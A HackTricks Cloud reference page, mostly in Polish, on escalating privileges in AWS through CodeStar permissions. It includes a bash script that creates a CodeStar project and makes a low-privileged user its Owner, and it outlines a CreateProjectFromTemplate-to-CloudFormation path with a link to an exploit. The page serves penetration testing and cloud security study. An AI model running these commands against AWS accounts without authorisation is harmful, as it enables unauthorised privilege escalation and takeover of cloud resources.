AWS - Codestar Privesc

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

Check the subscription plans!
Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

Codestar

Możesz znaleźć więcej informacji o codestar w:

codestar:CreateProject, codestar:AssociateTeamMember

`iam:PassRole`, `codestar:CreateProject`

Dzięki tym uprawnieniom możesz nadużyć roli IAM codestar, aby wykonać dowolne działania za pomocą szablonu cloudformation. Sprawdź następującą stronę:

iam:PassRole, codestar:CreateProject

`codestar:CreateProject`, `codestar:AssociateTeamMember`

Ta technika wykorzystuje codestar:CreateProject, aby stworzyć projekt codestar, oraz codestar:AssociateTeamMember, aby uczynić użytkownika IAM właścicielem nowego projektu CodeStar, co przyzna im nową politykę z kilkoma dodatkowymi uprawnieniami.

PROJECT_NAME="supercodestar"

aws --profile "$NON_PRIV_PROFILE_USER" codestar create-project \
--name $PROJECT_NAME \
--id $PROJECT_NAME

echo "Waiting 1min to start the project"
sleep 60

USER_ARN=$(aws --profile "$NON_PRIV_PROFILE_USER" opsworks describe-my-user-profile | jq .UserProfile.IamUserArn | tr -d '"')

aws --profile "$NON_PRIV_PROFILE_USER" codestar associate-team-member \
--project-id $PROJECT_NAME \
--user-arn "$USER_ARN" \
--project-role "Owner" \
--remote-access-allowed

Jeśli jesteś już członkiem projektu, możesz użyć uprawnienia codestar:UpdateTeamMember, aby zaktualizować swoją rolę na właściciela zamiast codestar:AssociateTeamMember.

Potencjalny wpływ: Privesc do polityki codestar. Możesz znaleźć przykład tej polityki w:

codestar:CreateProject, codestar:AssociateTeamMember

`codestar:CreateProjectFromTemplate`

Utwórz nowy projekt:

Wykorzystaj akcję codestar:CreateProjectFromTemplate, aby rozpocząć tworzenie nowego projektu.
Po pomyślnym utworzeniu, dostęp jest automatycznie przyznawany dla cloudformation:UpdateStack.
Ten dostęp dotyczy konkretnej stosu powiązanej z rolą IAM CodeStarWorker-<nazwa projektu>-CloudFormation.

Zaktualizuj docelowy stos:

Z przyznanymi uprawnieniami CloudFormation, przystąp do aktualizacji określonego stosu.
Nazwa stosu zazwyczaj będzie odpowiadać jednemu z dwóch wzorców:
awscodestar-<nazwa projektu>-infrastructure
awscodestar-<nazwa projektu>-lambda
Dokładna nazwa zależy od wybranego szablonu (odwołując się do przykładowego skryptu exploit).

Dostęp i uprawnienia:

Po aktualizacji uzyskujesz możliwości przypisane do roli IAM CloudFormation powiązanej z tym stosem.
Uwaga: To nie zapewnia z natury pełnych uprawnień administratora. Dodatkowe źle skonfigurowane zasoby w środowisku mogą być wymagane do dalszego podniesienia uprawnień.

Aby uzyskać więcej informacji, sprawdź oryginalne badania: https://rhinosecuritylabs.com/aws/escalating-aws-iam-privileges-undocumented-codestar-api/. Możesz znaleźć exploit w https://github.com/RhinoSecurityLabs/Cloud-Security-Research/blob/master/AWS/codestar_createprojectfromtemplate_privesc/CodeStarPrivEsc.py

Potencjalny wpływ: Privesc do roli IAM cloudformation.

Wsparcie HackTricks

Sprawdź plany subskrypcyjne!
Dołącz do 💬 grupy Discord lub grupy telegram lub śledź nas na Twitterze 🐦 @hacktricks_live.
Podziel się sztuczkami hackingowymi, przesyłając PR-y do HackTricks i HackTricks Cloud repozytoriów github.

PreviousAWS - Codepipeline Privesc Nextcodestar:CreateProject, codestar:AssociateTeamMember

Last updated 3 days ago